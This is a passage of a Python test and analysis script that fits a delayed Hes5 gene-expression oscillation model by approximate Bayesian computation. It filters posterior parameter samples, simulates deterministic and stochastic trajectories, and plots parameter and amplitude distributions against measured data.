prior_bounds = {'basal_transcription_rate' : (0.1,60),
'translation_rate' : (1,40),
'repression_threshold' : (0,120000),
'time_delay' : (5,40),
'hill_coefficient' : (2,6),
'noise_strength' : (0,20)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_agnostic',
prior_bounds = prior_bounds,
model = 'agnostic',
logarithmic = True,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEquals(my_prior_samples.shape,
(total_number_of_samples, 6))
def xest_plot_phase_space(self):
# phase space: we have two options: mrna vs protein or
# protein vs dprotein (or mrna vs dmrna)
# let's start w protein vs mrna
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.8)))))
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0]
my_trajectory = hes5.generate_deterministic_trajectory( duration = 1000 + 5*1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
hill_coefficient = this_parameter[4],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2])
# my_stochastic_trajectory = hes5.generate_langevin_trajectory( duration = 1000 + 5*1500,
my_stochastic_trajectory = hes5.generate_langevin_trajectory( duration = 1000+ 5*1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
hill_coefficient = this_parameter[4],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2],
equilibration_time = 0)
# equilibration_time = 1000.0)
# my_trajectory = my_trajectory[my_trajectory[:,0]>1000]
# my_trajectory[:,0] -= 1000
figuresize = (4,5)
my_figure = plt.figure(figsize = figuresize)
my_figure.add_subplot(311)
plt.plot(my_trajectory[:,0],my_trajectory[:,2], color = 'black', alpha = 0.3)
plt.xlabel('Time')
plt.ylabel('det. Protein')
my_figure.add_subplot(312)
plt.plot(my_stochastic_trajectory[:,0],my_stochastic_trajectory[:,2], color = 'black', alpha = 0.3)
plt.xlabel('Time')
plt.ylabel('stoch. Protein')
my_figure.add_subplot(313)
plt.plot(my_trajectory[:-1,1],my_trajectory[:-1,2], color = 'black', alpha = 0.3)
plt.plot(my_stochastic_trajectory[:,1],my_stochastic_trajectory[:,2], color = 'blue', alpha = 0.3)
plt.xlabel('mRNA')
plt.ylabel('Protein')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_phase_space_analysis.pdf'))
def xest_obtain_maximum_likelihood_estimate(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_samples[:,0] = np.log10(my_posterior_samples[:,0])
my_posterior_samples[:,1] = np.log10(my_posterior_samples[:,1])
kernel_density_function = scipy.stats.gaussian_kde(my_posterior_samples.transpose())
minimizing_function = lambda x: -1*kernel_density_function(x)
print('likelihood at typical value is')
print(kernel_density_function([0,1.3,45000,30,4]))
#
# optimize_result = scipy.optimize.minimize(minimizing_function,
# x0 = [0,1.3,45000,30,4],
# bounds = [(-1, np.log10(60)),
# (0, np.log10(40)),
# (0,120000),
# (5,40),
# (2,6)],
# tol = 1e-14,
# options = {'disp': True})
#
# maximum_likelihood_estimate = optimize_result.x
maximum_likelihood_estimate = scipy.optimize.fmin(minimizing_function,
x0 = [0,1.3,45000,30,4])
maximum_likelihood_estimate[0] = np.power(10, maximum_likelihood_estimate[0])
maximum_likelihood_estimate[1] = np.power(10, maximum_likelihood_estimate[1])
print('maximum_likelihood_estimate is')
print(maximum_likelihood_estimate)
def test_plot_deterministic_posterior_distributions_with_KDE(self):
option = 'oscillating'
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
if option == 'full':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
elif option == 'oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #standard deviation
elif option == 'not_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.1))))) #standard deviation
elif option == 'deterministic':
accepted_indices = np.where(np.logical_and(model_results[:,5]>55000, #protein number
np.logical_and(model_results[:,5]<65000, #protein_number
# np.logical_and(model_results[:,6]<0.15, #standard deviation
# model_results[:,6]>0.05))))
model_results[:,6]>0.05)))
else:
ValueError('could not identify posterior option')
#
my_posterior_samples = prior_samples[accepted_indices]
# pairplot = hes5.plot_posterior_distributions( my_posterior_samples )
# pairplot.savefig(os.path.join(os.path.dirname(__file__),
# 'output','pairplot_extended_abc_' + option + '.pdf'))
print('Number of accepted samples is ')
print(len(my_posterior_samples))
my_posterior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
print('minimum time delay is')
print(np.min(data_frame['Transcription delay']))
print('minimum hill coefficient is')
print(np.min(data_frame['Hill coefficient']))
nbins=20
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),nbins)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,2.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),nbins)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
# plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
# plt.gca().set_ylim(0,4.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = nbins)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
# plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
# time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = nbins)
# bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
# plt.gca().set_ylim(0,0.08)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = nbins)
# plt.gca().set_xlim(1,200)
# plt.gca().set_ylim(0,0.7)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','kde_inference_for_paper_' + option + '.pdf'))
def xest_plot_example_deterministic_trace(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
accepted_indices = np.where(np.logical_and(model_results[:,5]>55000, #protein number
np.logical_and(model_results[:,5]<65000, #protein_number
np.logical_and(model_results[:,6]<0.15, #standard deviation
model_results[:,6]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0]
my_trajectory = hes5.generate_deterministic_trajectory( duration = 1000 + 5*1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
hill_coefficient = this_parameter[4],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2])
my_trajectory = my_trajectory[my_trajectory[:,0]>1000]
my_trajectory[:,0] -= 1000
self.assertGreaterEqual(np.min(my_trajectory),0.0)
figuresize = (4,2.5)
my_figure = plt.figure()
plt.plot(my_trajectory[:,0],
my_trajectory[:,1]*100, label = 'mRNA*100', color = 'black')
plt.plot(my_trajectory[:,0],
my_trajectory[:,2], label = 'Hes protein', color = 'black', ls = '--')
plt.xlabel('Time')
plt.ylabel('Copy number')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_deterministic_oscillating_trajectory.pdf'))
def xest_plot_agnostic_oscillating_variation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0,:]
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
my_trajectory = hes5.generate_agnostic_noise_trajectory( duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
hill_coefficient = this_parameter[4],
noise_strength = this_parameter[5],
initial_mRNA = 3,
initial_protein = this_parameter[2],
equilibration_time = 1000.0)
self.assertGreaterEqual(np.min(my_trajectory),0.0)
figuresize = (4,2.5)
my_figure = plt.figure()
plt.plot(my_trajectory[:,0],
my_trajectory[:,1]*100, label = 'mRNA*100', color = 'black')
plt.plot(my_trajectory[:,0],
my_trajectory[:,2], label = 'Hes protein', color = 'black', ls = '--')
plt.xlabel('Time')
plt.ylabel('Copy number')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_agnostic_oscillating_trajectory.pdf'))
def xest_plot_agnostic_not_oscillating_variation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.05))))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0,:]
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
my_trajectory = hes5.generate_agnostic_noise_trajectory( duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
hill_coefficient = this_parameter[4],
noise_strength = this_parameter[5],
initial_mRNA = 3,
initial_protein = this_parameter[2],
equilibration_time = 1000.0)
self.assertGreaterEqual(np.min(my_trajectory),0.0)
figuresize = (4,2.5)
my_figure = plt.figure()
plt.plot(my_trajectory[:,0],
my_trajectory[:,1]*100, label = 'mRNA*100', color = 'black')
plt.plot(my_trajectory[:,0],
my_trajectory[:,2], label = 'Hes protein', color = 'black', ls = '--')
plt.xlabel('Time')
plt.ylabel('Copy number')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_agnostic_not_oscillating_trajectory.pdf'))
def xest_plot_agnostic_posterior_distributions(self):
option = 'full'
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
if option == 'full':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #noise strength
elif option == 'oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #standard deviation
elif option == 'not_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.1))))) #standard deviation
else:
ValueError('could not identify posterior option')
#
my_posterior_samples = prior_samples[accepted_indices]
print('Number of accepted samples is ')
print(len(my_posterior_samples))
pairplot = hes5.plot_posterior_distributions( my_posterior_samples )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_agnostic_abc_' + option + '.pdf'))
# my_posterior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient',
'Noise strength'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(161)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(162)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(163)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(164))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(165))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(166))
sns.distplot(data_frame['Noise strength'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
# plt.gca().set_ylim(0,0.35)
# plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','agnostic_inference' + option + '.pdf'))
def xest_plot_amplitude_distribution(self):
option = 'lower_amplitude'
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
measured_data = [0.115751936, 0.09571043, 0.070593436, 0.074172953, 0.079566358, 0.04600834,
0.079873319, 0.097029606, 0.084070369, 0.105528875, 0.12579082, 0.042329269,
0.064591498, 0.059602288, 0.057944518, 0.051163091, 0.058111095, 0.102434224,
0.080997961, 0.070390139, 0.047127818, 0.095665455, 0.048707284, 0.083330235,
0.072446835, 0.059289326, 0.175901785, 0.08870091, 0.060774517, 0.119311781,
0.071923541, 0.106271586, 0.063191815, 0.068603169, 0.051063533, 0.074326763,
0.030455154, 0.09777155, 0.07789995, 0.052264432, 0.107642115, 0.078060039,
0.053932836, 0.04064868, 0.080203462, 0.102682858, 0.085553023, 0.050921194,
0.107150422, 0.075111352, 0.085250494, 0.06022623, 0.055863624, 0.070855159,
0.072975538, 0.038283748, 0.05842959, 0.069960347, 0.075625282, 0.033601918,
0.10112012, 0.069907351, 0.047498028, 0.054963426, 0.015357264, 0.091893038,
0.030862283, 0.012518025, 0.038223482, 0.05825977, 0.072195839, 0.020020349,
0.05988876, 0.054678433, 0.08156298, 0.075856751, 0.080105646, 0.084244903,
0.060850253, 0.079889701, 0.114204526, 0.048641408, 0.087017989, 0.072664986,
0.135295363, 0.044380981, 0.024025198, 0.068262356, 0.019802578, 0.064603775,
0.076865303, 0.083760066, 0.059606547, 0.05627585, 0.050701138, 0.064442271,
0.073845055, 0.086630591, 0.034115231, 0.036910128, 0.05845354, 0.055185653,
0.081778966, 0.041642038, 0.032706612, 0.034264942, 0.076971854, 0.046987517,
0.060216471, 0.091438729, 0.0341048, 0.072119114, 0.050266261, 0.076173687,
0.059316138, 0.07362588, 0.043229577, 0.056437502, 0.042911643, 0.072583345,
0.069809296, 0.063362361, 0.051916029, 0.042110911, 0.071238566, 0.069599676,
0.056064602, 0.055051899, 0.063226639, 0.076379692, 0.158771206, 0.037536219,
0.055238055, 0.074217076, 0.094215882, 0.057284261, 0.066521902, 0.075479027,
0.0921231, 0.078040383, 0.07767914, 0.053502299, 0.083650072, 0.084202846,
0.065188768, 0.057116998, 0.079006745, 0.058366725, 0.062152612, 0.062281059,
0.036391176, 0.079608123, 0.05814215, 0.084222668, 0.071304801, 0.09422804,
0.106918005, 0.110727013, 0.10753385, 0.078788611, 0.07298067, 0.078655859,
0.045046025, 0.061084624, 0.085156637, 0.109648343, 0.06425073, 0.096245619,
0.056215123, 0.085664518, 0.066525248, 0.088294766, 0.055145696, 0.075250338,
0.04822837, 0.019409385, 0.047170987, 0.030422279, 0.0818539, 0.07351729,
0.083877723]
if option == 'prior':
accepted_indices = (range(len(prior_samples)),)
elif option == 'mean':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
model_results[:,0]<65000)) #protein_number
elif option == 'full':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #noise strength
elif option == 'oscillating':
accepted_indices = np.where(model_results[:,3]>0.3) #standard deviation
elif option == 'mean_and_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
model_results[:,3]>0.3))) #standard deviation
elif option == 'mean_and_period':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,2]>240,
model_results[:,2]<300)))) #standard deviation
elif option == 'mean_and_period_and_coherence':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,2]>240,
np.logical_and(model_results[:,2]<300,
model_results[:,3]>0.3))))) #standard deviation
elif option == 'lower_amplitude':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
elif option == 'agnostic_prior':
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = (range(len(prior_samples)),)
elif option == 'agnostic_mean':
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
model_results[:,0]<65000)) #protein_number
elif option == 'agnostic_mean_and_coherence':
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
model_results[:,3]>0.3))) #standard deviation
elif option == 'not_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.1))))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
else:
ValueError('could not identify posterior option')
my_posterior_samples = prior_samples[accepted_indices]
print('so many posterior samples')
print(len(my_posterior_samples))
my_model_results = model_results[accepted_indices]
my_posterior_samples[:,2]/=10000
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,3))
my_figure.add_subplot(211)
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_standard_deviations = my_model_results[:,1]
plt.axvline(np.mean(all_standard_deviations))
sns.distplot(all_standard_deviations,
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
)
# bins = 20)
# plt.gca().set_xlim(-1,2)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Standard deviation/mean HES5")
plt.xlim(0,0.25)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(212)
sns.distplot(measured_data,
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Standard deviation/mean HES5")
plt.axvline(np.mean(measured_data))
print('maximal measured value')
print(np.max(measured_data))
plt.xlim(0,0.25)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_standard_deviation_' + option + '.pdf'))
my_boxplot_figure = plt.figure(figsize = [4,2.5])
sns.boxplot(data = [all_standard_deviations, measured_data])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.ylabel('Period [min]')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_standard_deviation_boxplot_' + option + '.pdf'))
def xest_plot_period_distribution_boxplot(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that verionica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
sns.set(font_scale = 1.5)
font = {'size' : 28}
plt.rc('font', **font)
all_periods = my_model_results[:,2]
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
# print('mean period is')
# print(np.mode(all_periods[all_periods<600]))
# import pdb; pdb.set_trace()
